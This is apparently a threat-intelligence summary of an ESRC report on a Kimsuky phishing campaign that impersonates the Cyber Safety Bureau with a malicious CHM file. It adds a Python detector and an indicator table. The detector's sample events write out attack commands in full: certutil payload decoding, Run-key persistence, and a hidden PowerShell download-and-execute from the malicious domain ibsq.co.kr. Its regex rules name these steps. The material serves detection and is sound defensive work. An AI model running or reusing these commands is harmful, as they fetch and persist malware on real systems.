Kimsuky hacking attempt disguised as a 'Cyber Safety Bureau' email!

2023-03-14 ESTSecurity Kimsuky hacking attempt disguised as a Cyber Safety Bureau email

https://blog.alyac.co.kr/5102


ESRC attributes a Korean-language phishing campaign to Kimsuky, targeting people connected to North Korea-related organizations with email impersonating the Cyber Safety Bureau. The lure claimed the recipient faced legal or account-abuse issues and attached an archive containing a CHM file named for information-network law; opening it displayed benign help content while a Click() script ran in the background. That script stored encoded commands in Document.dat, used Certutil to decode them into Document.vbs, registered persistence through the Run key, and executed PowerShell fetched from ibsq.co.kr to steal user information. The report notes North Korean wording in the email body and lists hashes plus ibsq.co.kr URLs as representative indicators.
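As an added example (not code from the ESRC report or from this page), the following Python scans constructed process-creation events for the chain summarized above: Certutil decoding a .dat into a .vbs, a Run-key registration, and a PowerShell download from ibsq.co.kr, raising severity when the process ancestry includes the CHM viewer (hh.exe) or wscript.exe. The process images, file paths, Run-key value name and URL path are assumed values chosen for the sample, not indicators from the report.

```python
import re

# Constructed sample process-creation events (not from the report):
# (pid, ppid, image, command_line), in the order they were logged.
# The URL path is a placeholder; the report's paths are truncated.
SAMPLE_EVENTS = [
    (100, 1,   "explorer.exe",   "explorer.exe"),
    (200, 100, "hh.exe",         r"hh.exe C:\Users\kim\Downloads\Law.chm"),
    (300, 200, "cmd.exe",        r"cmd.exe /c certutil -decode %TEMP%\Document.dat %TEMP%\Document.vbs"),
    (400, 200, "reg.exe",        r'reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v Update /d "wscript %TEMP%\Document.vbs"'),
    (500, 200, "wscript.exe",    r"wscript.exe %TEMP%\Document.vbs"),
    (600, 500, "powershell.exe", "powershell.exe -w hidden -c \"IEX (New-Object Net.WebClient).DownloadString('http://ibsq.co.kr/config/x')\""),
    (700, 100, "certutil.exe",   "certutil -verify cert.cer"),  # benign use, must not alert
]

# Each rule names one step of the chain described in the report.
RULES = [
    ("certutil_decode",     re.compile(r"\bcertutil(\.exe)?\b.*\s-decode(hex)?\b", re.I)),
    ("run_key_persistence", re.compile(r"\breg(\.exe)?\s+add\b.*\\CurrentVersion\\Run\b", re.I)),
    ("powershell_download", re.compile(r"\bpowershell(\.exe)?\b.*(DownloadString|IEX|Invoke-Expression|\s-enc)", re.I)),
]

# Parents whose presence in the ancestry makes a hit high severity:
# a help file (hh.exe) or a script host should not be launching these.
SUSPICIOUS_ANCESTORS = {"hh.exe", "wscript.exe", "cscript.exe"}


def ancestry(pid, by_pid):
    """Return lower-cased process images from pid up to the first unknown parent."""
    chain = []
    while pid in by_pid:
        _, ppid, image, _ = by_pid[pid]
        chain.append(image.lower())
        pid = ppid
    return chain


def detect(events):
    """Return (pid, rule_name, severity) for every command line matching a rule."""
    by_pid = {e[0]: e for e in events}
    findings = []
    for pid, ppid, _image, cmd in events:
        for name, rx in RULES:
            if rx.search(cmd):
                parents = set(ancestry(ppid, by_pid))
                severity = "high" if parents & SUSPICIOUS_ANCESTORS else "medium"
                findings.append((pid, name, severity))
    return findings


if __name__ == "__main__":
    for hit in detect(SAMPLE_EVENTS):
        print(hit)
```

In a real deployment the same rules would run over Sysmon event ID 1 or Windows 4688 records, where the parent process chain is available for the ancestry check.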

Indicators of Compromise

Type Value First Seen Last Seen
DOMAIN ibsq.co.kr 2023-03-14 2023-06-09
HASH ded83a6bd7438b34b058f2fe5ee54c7e 2023-03-14 2023-05-24
URL http://ibsq.co.kr/config/demo.t… 2023-03-14 2023-05-24
HASH 0f1a2d2104269be9afadaab2b644fbb6 2023-03-14 2023-03-14
HASH 7ba620bf5151e68890d818629587cb14 2023-03-14 2023-03-14
URL http://ibsq.co.kr/config/show.p… 2023-03-14 2023-03-14
